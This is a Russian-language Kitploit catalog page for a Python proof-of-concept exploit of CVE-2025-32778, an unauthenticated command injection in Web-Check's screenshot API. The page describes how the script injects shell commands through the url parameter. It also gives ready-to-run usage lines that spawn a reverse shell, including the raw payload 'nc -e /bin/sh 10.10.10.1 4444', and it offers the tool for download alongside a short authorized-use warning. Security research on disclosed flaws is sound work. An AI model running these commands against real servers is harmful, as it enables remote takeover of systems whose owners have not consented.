Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-32778 — PoC-эксплойт для CVE-2025-32778: внедрение команд в инструменте OSINT Web-Check | Kitploit
Инструменты/GitHubGitHub/00xcanelo/cve-2025-32778
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHub00xcanelo/cve-2025-32778

CVE-2025-32778

PoC-эксплойт для CVE-2025-32778: внедрение команд в инструменте OSINT Web-Check

Репозиторий
31571 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-32778 - Эксплуатация внедрения команд в Web-Check

Critical Language: Python

Описание

CVE-2025-32778 — это критическая уязвимость внедрения команд в инструменте OSINT Web-Check от Lissy93.
Она позволяет неавторизованным злоумышленникам выполнять произвольные системные команды через параметр url в API создания скриншотов.

Этот скрипт на Python автоматизирует эксплуатацию и может генерировать реверс-шеллы или принимать пользовательские полезные нагрузки оболочки.


Предупреждение

  • Тестируйте только на системах, которыми вы владеете или на тестирование которых у вас есть разрешение.
  • Несанкционированное использование незаконно и неэтично.

Возможности

  • Эксплуатирует внедрение команд в параметре url в Web-Check.
  • Поддерживает:
    • Реверс-шелл с параметрами --lhost и --lport.
    • Пользовательскую оболочку через --shell.
  • Нормализация URL.
  • Предотвращает одновременное использование --shell с --lhost/--lport.

Требования

  • Python 3.x
  • Библиотека Requests:
pip install requests

Использование

git clone https://github.com/00xCanelo/CVE-2025-32778
cd CVE-2025-32778

Заставить инструмент создать реверс-шелл

python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --lhost 10.10.10.1 --lport 4444

Пользовательская полезная нагрузка оболочки (сырая)

python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --shell "nc -e /bin/sh 10.10.10.1 4444"

Справка

python3 cve-2025-32778.py -h

Как это работает

  1. Привести целевой URL к виду scheme://host[:port].

  2. Подготовить полезную нагрузку:

    • Сгенерировать реверс-шелл с использованием --lhost и --lport.
    • Или использовать сырую команду оболочки с --shell.
  3. Закодировать полезную нагрузку оболочки для безопасного внедрения в URL.

  4. Отправить HTTP GET-запрос на /api/screenshot/ с полезной нагрузкой.

  5. Ожидать подключения реверс-шелла.


🧑‍💻 Автор

00xCanelo
GitHub Profile


Ссылки

  • Репозиторий Web-Check на GitHub – Оригинальный проект, содержащий уязвимый код.
  • CVE-2025-32778 – Запись CVE, описывающая уязвимость внедрения команд.
Скачать инструмент